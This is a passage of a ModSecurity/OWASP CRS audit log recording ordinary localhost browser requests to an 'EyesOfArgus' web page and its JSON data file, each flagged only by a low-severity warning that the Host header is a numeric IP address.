\"WRc4hX8AAQEAABwOGnwAAAAB\"]"],"stopwatch":{"p1":631,"p2":1415,"p3":80,"p4":327,"p5":168,"sr":25,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:47:04 --0400","transaction_id":"WRc4iH8AAQEAABwOGn0AAAAB","remote_address":"127.0.0.1","remote_port":42666,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","DNT":"1","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:46:59 GMT","ETag":"\"295-54f6a9212064f\"","Accept-Ranges":"bytes","Content-Length":"661","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc4iH8AAQEAABwOGn0AAAAB\"]"],"stopwatch":{"p1":499,"p2":965,"p3":53,"p4":157,"p5":57,"sr":18,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:47:05 --0400","transaction_id":"WRc4iX8AAQEAABwOGn4AAAAB","remote_address":"127.0.0.1","remote_port":42666,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc4iX8AAQEAABwOGn4AAAAB\"]"],"stopwatch":{"p1":385,"p2":908,"p3":53,"p4":243,"p5":61,"sr":16,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:47:05 --0400","transaction_id":"WRc4iX8AAQEAABwOGn8AAAAB","remote_address":"127.0.0.1","remote_port":42666,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=96","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc4iX8AAQEAABwOGn8AAAAB\"]"],"stopwatch":{"p1":407,"p2":825,"p3":44,"p4":346,"p5":47,"sr":17,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:47:53 --0400","transaction_id":"WRc4uX8AAQEAABwPUrAAAAAC","remote_address":"127.0.0.1","remote_port":42678,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive","Upgrade-Insecure-Requests":"1"}},"response":{"protocol":"HTTP/1.1","status":301,"headers":{"Location":"http://127.0.0.1/EyesOfArgus/","Content-Length":"312","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>301 Moved Permanently</title>\n</head><body>\n<h1>Moved Permanently</h1>\n<p>The document has moved <a href=\"http://127.0.0.1/EyesOfArgus/\">here</a>.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus\"] [unique_id \"WRc4uX8AAQEAABwPUrAAAAAC\"]"],"handler":"httpd/unix-directory","stopwatch":{"p1":697,"p2":1034,"p3":50,"p4":293,"p5":54,"sr":43,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:47:54 --0400","transaction_id":"WRc4un8AAQEAABwPUrEAAAAC","remote_address":"127.0.0.1","remote_port":42678,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/ HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive","Upgrade-Insecure-Requests":"1"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:47:50 GMT","ETag":"\"cca-54f6a951c3ab7-gzip\"","Accept-Ranges":"bytes","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1211","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/\"] [unique_id \"WRc4un8AAQEAABwPUrEAAAAC\"]"],"stopwatch":{"p1":380,"p2":971,"p3":63,"p4":412,"p5":65,"sr":16,"sw":2,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:47:55 --0400","transaction_id":"WRc4u38AAQEAABwPUrIAAAAC","remote_address":"127.0.0.1","remote_port":42678,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","DNT":"1","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:47:51 GMT","ETag":"\"295-54f6a953550a5\"","Accept-Ranges":"bytes","Content-Length":"661","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc4u38AAQEAABwPUrIAAAAC\"]"],"stopwatch":{"p1":671,"p2":1385,"p3":60,"p4":236,"p5":65,"sr":28,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:47:55 --0400","transaction_id":"WRc4u38AAQEAABwPUrMAAAAC","remote_address":"127.0.0.1","remote_port":42678,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc4u38AAQEAABwPUrMAAAAC\"]"],"stopwatch":{"p1":601,"p2":1386,"p3":91,"p4":415,"p5":535,"sr":24,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:47:55 --0400","transaction_id":"WRc4u38AAQEAABwPUrQAAAAC","remote_address":"127.0.0.1","remote_port":42678,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=96","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc4u38AAQEAABwPUrQAAAAC\"]"],"stopwatch":{"p1":469,"p2":1129,"p3":76,"p4":268,"p5":67,"sr":18,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:48:28 --0400","transaction_id":"WRc43H8AAQEAABwQSB0AAAAD","remote_address":"127.0.0.1","remote_port":42692,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive","Upgrade-Insecure-Requests":"1"}},"response":{"protocol":"HTTP/1.1","status":301,"headers":{"Location":"http://127.0.0.1/EyesOfArgus/","Content-Length":"312","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>301 Moved Permanently</title>\n</head><body>\n<h1>Moved Permanently</h1>\n<p>The document has moved <a href=\"http://127.0.0.1/EyesOfArgus/\">here</a>.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus\"] [unique_id \"WRc43H8AAQEAABwQSB0AAAAD\"]"],"handler":"httpd/unix-directory","stopwatch":{"p1":579,"p2":1152,"p3":55,"p4":344,"p5":58,"sr":41,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:48:29 --0400","transaction_id":"WRc43X8AAQEAABwQSB4AAAAD","remote_address":"127.0.0.1","remote_port":42692,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/ HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive","Upgrade-Insecure-Requests":"1"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:48:25 